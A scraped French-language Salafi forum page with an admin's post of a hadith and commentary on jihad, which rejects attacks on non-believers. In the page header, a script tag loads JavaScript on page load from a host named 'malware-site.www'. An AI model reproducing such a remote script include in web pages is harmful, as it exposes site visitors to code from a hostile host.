ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Septembre 2017

LunMarMerJeuVenSamDim
    123
45678910
11121314151617
18192021222324
252627282930 

Calendrier Calendrier

anipassion.com

    tres beau hadith

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    tres beau hadith

    Message par assalafia le Mar 28 Avr - 14:13

    Deux gouttes et deux traces
     
    Au nom d'Allah, le Tout Miséricordieux, le Très Miséricordieux.

    D'après Abou Oumama Al Bahili (qu'Allah l'agrée), le Prophète (que la prière d'Allah et Son salut soient sur lui) a dit : « Il n'y a rien qui est plus aimé par Allah que deux gouttes et deux traces : une larme qui a coulée par crainte d'Allah et une goutte de sang qui a été versée dans le sentier d'Allah (1).
    Quant aux deux traces: une trace faite dans le sentier d'Allah et une trace pour une obligation parmi les obligations d'Allah (2) ».
    (Rapporté par Tirmidhi dans ses Sounan n°1669 et authentifié par Cheikh Albani dans sa correction de Sounan Tirmidhi)

    (1) C'est à dire dans le djihad dans le sentier d'Allah.

    Le djihad signifie le fait de faire des efforts à la fois par la parole, la main, les biens et la plume afin de combattre le nafs (la partie de la personne qui la pousse vers le mal), les pécheurs, les innovateurs, les hypocrites et les mécréants dans le but que la parole d'Allah soit la plus haute.
    (voir Zad Al Ma'ad de l'imam Ibn Qayim Am Djawziya vol 3 à partir de la page 9)

    Ceci est le sens général du mot djihad. Dans le hadith ce qui est voulu est le combat contre les mécréants.
    (voir Al Mouqadimat Al Moumahidat de l'imam Ibn Rouchd Al Maliki vol 1 p 342)

    Je précise et j'insiste sur le fait que le djihad, comme les autres adorations, ont des conditions à respecter et des règles qui lui sont précises afin qu'il soit agrée et pas détesté par Allah.
    (voir Ar Rad Ala Al Akhnai de cheikh Al Islam Ibn Taymiya p 607)

    Je précise également que le fait de tuer des mécréants dans des attentats comme cela se passe à notre époque ne fait ni partie de l'Islam ni partie du djihad.
    (Voir Bi Ayi Aqlin Wa Din Yakoun Al Tadmir Jihadan de cheikh Abdel Mouhsin Al Abad)

    (2) Comme par exemple la peau qui se craque à cause de l'humidité suite aux ablutions dans le froid, la nez qui se brûle quand on fait la prosternation sur le sol chaud, les pieds de la personne qui se couvre de poussière car il marche dans le hajj...
    (Touhfatoul Ahwadhi Charh Sounan Tirmidhi)

    [size=32]
    عن أبي أمامة الباهلي رضي الله عنه قال رسول الله صلى الله عليه و سلم : ليس شيء أحب إلى الله من قطرتين وأثرين : قطرة دموع من خشية الله وقطرة دم تهراق في سبيل الله . وأما الأثران : فأثر في سبيل الله وأثر في فريضة من فرائض الله
    (رواه الترمذي في سننه رقم ١٦٦٩ و حسنه و حسنه أيضاً الشيخ الألباني في تحقيق سنن الترمذي)[/size]
     
     



     

      La date/heure actuelle est Dim 24 Sep - 18:54